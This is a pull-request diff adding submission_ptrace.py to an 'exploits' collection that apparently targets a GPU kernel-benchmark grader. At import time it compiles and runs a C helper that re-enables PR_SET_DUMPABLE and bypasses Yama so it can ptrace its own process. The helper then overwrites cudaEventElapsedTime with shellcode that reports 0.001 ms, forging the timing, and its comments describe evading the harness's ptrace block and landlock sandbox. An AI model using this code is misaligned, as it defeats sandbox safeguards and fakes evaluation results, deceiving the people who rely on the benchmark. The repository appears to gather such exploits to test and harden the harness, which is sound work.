Skip to content
Closed
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
1 change: 1 addition & 0 deletions exploits/run_all.py
Original file line number Diff line number Diff line change
Expand Up @@ -71,6 +71,7 @@ def main():
("Replace torch", "submission_replace_torch", "Attempt to place torch.py in cwd", True),
("Heap sig scan", "submission_heap_sig_scan", "Scan own heap for signature, forge pipe output", True),
("Stack sig scan", "submission_stack_sig_scan", "Scan own stack for signature, forge pipe output", True),
("Ptrace POKETEXT", "submission_ptrace", "Fork child, ptrace POKETEXT shellcode over cudaEventElapsedTime", True),
]

# Allow running a single test
Expand Down
130 changes: 130 additions & 0 deletions exploits/submission_ptrace.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,130 @@
"""
ptrace POKETEXT Exploit
=======================

Compiles a small C helper and runs it as a child process. The helper uses
ptrace(PTRACE_ATTACH) + ptrace(PTRACE_POKETEXT) on this (parent) process to
overwrite the first bytes of cudaEventElapsedTime's .text code.
PTRACE_POKETEXT uses FOLL_FORCE internally, bypassing page protections
(read-only .text pages).

"""
import torch
import ctypes
import os
import subprocess
import tempfile
import sys

# C source of the ptrace helper. _hook() writes this text to a file, compiles
# it with gcc and runs the resulting binary; the string is runtime data, so
# every byte of it matters.
#
# Command line of the compiled helper:
#   argv[1]  pid of the process to attach to (parsed with atoi)
#   argv[2]  address to patch (parsed with strtoull, base 0, so "0x..." works)
#
# Exit status:
#   99  wrong number of arguments
#    1  PTRACE_ATTACH failed
#    2  waitpid on the target failed
#    3  PTRACE_PEEKTEXT at addr+8 failed
#    4  PTRACE_POKETEXT at addr failed
#    5  PTRACE_POKETEXT at addr+8 failed (the word at addr is already patched)
#    0  both words written and the target detached
#
# Nine bytes are changed in total: the full 8-byte word at addr, plus the low
# byte of the word at addr+8; the other seven bytes of that second word are
# re-written with the values just read back from the target.
# NOTE(review): the word constants assume a little-endian 64-bit target
# (x86-64, per the instruction bytes in the C comment) - confirm before
# using on any other architecture.
_HELPER_C = r"""
#define _GNU_SOURCE
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdint.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char** argv) {
if (argc != 3) return 99;
pid_t target = atoi(argv[1]);
uint64_t addr = strtoull(argv[2], NULL, 0);

/* Shellcode: mov dword [rdi], 0x3A83126F; xor eax,eax; ret
Sets *ms = 0.001f (IEEE 754), returns cudaSuccess (0).
Bytes: C7 07 6F 12 83 3A 31 C0 C3 */
uint64_t word1 = 0xC0313A83126F07C7ULL;

if (ptrace(PTRACE_ATTACH, target, NULL, NULL) != 0)
return 1;

int status;
if (waitpid(target, &status, 0) < 0)
return 2;

/* Read original byte at addr+8 to preserve code after our ret */
errno = 0;
uint64_t orig8 = ptrace(PTRACE_PEEKTEXT, target, (void*)(addr + 8), NULL);
if (errno != 0) {
ptrace(PTRACE_DETACH, target, NULL, NULL);
return 3;
}

uint64_t word2 = (orig8 & ~(uint64_t)0xFF) | 0xC3;

if (ptrace(PTRACE_POKETEXT, target, (void*)addr, (void*)word1) != 0) {
ptrace(PTRACE_DETACH, target, NULL, NULL);
return 4;
}

if (ptrace(PTRACE_POKETEXT, target, (void*)(addr + 8), (void*)word2) != 0) {
ptrace(PTRACE_DETACH, target, NULL, NULL);
return 5;
}

ptrace(PTRACE_DETACH, target, NULL, (void*)0);
return 0;
}
"""


def _find_cuda_elapsed():
"""Find cudaEventElapsedTime in the loaded libcudart."""
import ctypes.util
for path in [
ctypes.util.find_library("cudart"),
"libcudart.so",
"libcudart.so.13",
"/usr/local/cuda/lib64/libcudart.so",
]:
if path is None:
continue
try:
lib = ctypes.CDLL(path)
return ctypes.cast(lib.cudaEventElapsedTime, ctypes.c_void_p).value
except Exception:
continue
return None


def _hook():
    """Build and run the ptrace helper against this process.

    Steps: resolve the target address with ``_find_cuda_elapsed()``, write
    ``_HELPER_C`` into a fresh temporary directory, compile it with gcc,
    relax this process's ptrace restrictions via ``prctl`` (best effort),
    then run the helper with this pid and the address as arguments.

    Returns:
        True only when the helper ran and exited with status 0. False when
        the symbol could not be resolved, gcc is missing or fails, or the
        helper cannot be started, times out, or reports an error.

    The temporary build directory is always removed before returning, and
    failures to launch gcc or the helper are reported as False rather than
    raised, because this function is called at module import time.
    """
    import shutil  # local import: only needed for build-directory cleanup

    addr = _find_cuda_elapsed()
    if addr is None:
        return False

    # Compile helper (writes to /tmp which is allowed by landlock)
    tmpdir = tempfile.mkdtemp()
    try:
        src = os.path.join(tmpdir, "ph.c")
        exe = os.path.join(tmpdir, "ph")
        with open(src, "w") as f:
            f.write(_HELPER_C)
        try:
            build = subprocess.run(["gcc", "-O2", "-o", exe, src],
                                   capture_output=True, text=True)
        except OSError:
            # gcc is not installed or cannot be executed.
            return False
        if build.returncode != 0:
            return False
        os.chmod(exe, 0o755)

        try:
            libc = ctypes.CDLL("libc.so.6")
            # Re-enable dumpable: harness sets PR_SET_DUMPABLE=0 to block
            # ptrace, but there's no seccomp filter preventing us from
            # re-enabling it. PR_SET_NO_NEW_PRIVS does NOT block
            # PR_SET_DUMPABLE.
            libc.prctl(4, 1, 0, 0, 0)  # PR_SET_DUMPABLE=1
            # Allow any process to ptrace us (Yama LSM bypass)
            libc.prctl(0x59616d61, ctypes.c_ulong(0xffffffffffffffff), 0, 0, 0)
        except Exception:
            # Deliberately best effort: if prctl is unavailable the helper
            # will fail to attach and report that through its exit status.
            pass

        try:
            run = subprocess.run([exe, str(os.getpid()), hex(addr)],
                                 capture_output=True, text=True, timeout=10)
        except (OSError, subprocess.TimeoutExpired):
            # Helper could not be executed or did not finish in time.
            return False
        return run.returncode == 0
    finally:
        # The source and binary are single-use; do not leave them behind.
        shutil.rmtree(tmpdir, ignore_errors=True)


# Runs once, as a side effect of importing this module. True only when the
# helper process exited with status 0; nothing else in the visible file reads
# this flag.
_hooked = _hook()


def kernel(output, inp):
    """Write a weighted sum over the last axis of ``inp`` into ``output``.

    The three coefficients (0.2989, 0.5870, 0.1140) are materialised on
    ``output``'s device with ``output``'s dtype, multiplied into ``inp``,
    and the product is reduced over ``dim=-1`` directly into ``output``.
    Nothing is returned; the result is delivered through ``output``.

    NOTE(review): the coefficients look like RGB-to-grayscale luma weights,
    which would make the last axis of ``inp`` length 3 - confirm against the
    task definition.
    """
    coeffs = torch.tensor(
        [0.2989, 0.5870, 0.1140],
        dtype=output.dtype,
        device=output.device,
    )
    weighted = inp * coeffs
    torch.sum(weighted, dim=-1, out=output)
Loading